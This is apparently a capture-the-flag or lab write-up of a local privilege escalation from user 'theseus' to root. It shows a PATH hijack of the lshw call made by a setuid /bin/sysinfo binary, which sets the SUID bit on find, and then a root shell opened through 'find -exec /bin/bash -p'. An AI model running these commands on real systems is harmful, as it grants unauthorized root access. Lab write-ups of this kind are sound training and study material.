4 privesc theseus > root
# /bin/sysinfo
prints a lot of system stats
# running strings
====================Hardware Info====================
lshw -short
====================Disk Info====================
fdisk -l
====================CPU Info====================
cat /proc/cpuinfo
====================MEM Usage=====================
free -h
theseus@ubuntu:~/.ssh$ which lshw
/usr/bin/lshw
theseus@ubuntu:~/.ssh$ which fdisk
/sbin/fdisk
theseus@ubuntu:~/.ssh$ which free
/usr/bin/free
cat << EOF > lshw
#!/bin/bash
chmod +s /usr/bin/find;
EOF
theseus@ubuntu:~$ ls -la /usr/bin/find
-rwxr-xr-x 1 root root 238080 Nov 5 2017 /usr/bin/find
theseus@ubuntu:~$ /bin/sysinfo
[truncated]
theseus@ubuntu:~$ ls -la /usr/bin/find
-rwsr-sr-x 1 root root 238080 Nov 5 2017 /usr/bin/find
theseus@ubuntu:~$ find . -exec /bin/bash -p \; -quit
bash-4.4# whoami;id
root
uid=1000(theseus) gid=1000(theseus) euid=0(root) egid=0(root) groups=0(root),100(users),1000(theseus)
Last updated